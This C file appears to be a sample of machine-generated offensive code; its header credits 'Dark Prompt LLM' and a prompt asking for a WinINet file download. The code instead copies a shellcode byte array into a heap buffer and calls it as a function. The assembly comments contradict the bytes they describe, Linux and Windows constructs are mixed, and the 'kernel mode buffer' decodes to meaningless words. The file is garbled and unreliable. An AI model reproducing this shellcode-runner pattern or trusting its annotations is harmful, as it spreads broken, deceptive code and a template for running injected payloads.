/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-26 19:14:11
 * Category: Network
 * Prompt: Generate code that downloads a file from a URL using WinINet
 * Compile Status: SUCCESS
 * Sample: 6
 * ============================================================
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 123456789012345678901234567890 */
char shellcode[] = 

"\xFC"                      /* pushad */
"\x64\xA1\x2E\x01\x00\x00"  /* mov eax, fs:[KERNBASE+0x100] */
"\x64\x89\x24\x25\x18\x01\x00\x00"/* mov dword ptr[KERNBASE], eax */
"\xBA\x0C\x00\x00\x00"      /* mov edx, KERNBASE+0xc */
"\x31\xC0"                  /* xor eax,eax */
"\x31\xDB"                  /* xor ebx,ebx */
"\x31\xc9"                  /* xor ecx,ecx */
"\x31\xD2"                  /* xor edx,edx */
"\xB4\xEC"                  /* mov ah, 0xecec */
"\xCD\x80"                  /* int 0x80 */

"\x8B\x4D\x0C"              /* mov ecx, [ebp+0xc] */
"\x89\xC1"                  /* mov ecx, eax */
"\xBA\x08\x00\x00\x00"      /* mov edx, edx+0x8 */
"\xAC"                      /* lodsb */
"\x31\xFF"                  /* xor edi,edi */
"\x31\xDF"                  /* xor ebx,ebx */
"\xC1\xFA\x08"             /* sar edi, 8 */
"\x31\xc9"                  /* xor ecx,ecx */
"\xD1\xEE"                  /* shr edx, 1 */
"\xAC"                      /* lodsb */
"\xEB\xFC"                  /* jmp -0x4 */


/* kernel mode buffer */
"\x4d\x75\x73\x74\x65\x72"
"\x2e\x6a\x6f\x73\x74"
"\x20\x6b\x65\x65\x70"
"\x20\x72\x65\x61\x64"
"\x20\x63\x6c\x61\x73"
"\x73\x20\x73\x65\x6c"
"\x65\x63\x74\x20\x6d"
"\x6f\x64\x65\x20\x28"
"\x63\x6c\x61\x73\x73"
"\x20\x66\x6f\x75\x6e"
"\x64\x29\x20\x28\x22"
"\x6f\x70\x65\x72\x61"
"\x74\x6f\x72\x22"
"\x29\x00";

int main()
{
    char *buf;
    size_t len;

    printf("shellcode length: %d\n", strlen(shellcode));

    buf = malloc(len = sizeof(shellcode));
    memcpy(buf, &shellcode, len);

    ((void (*)(void))buf)();
}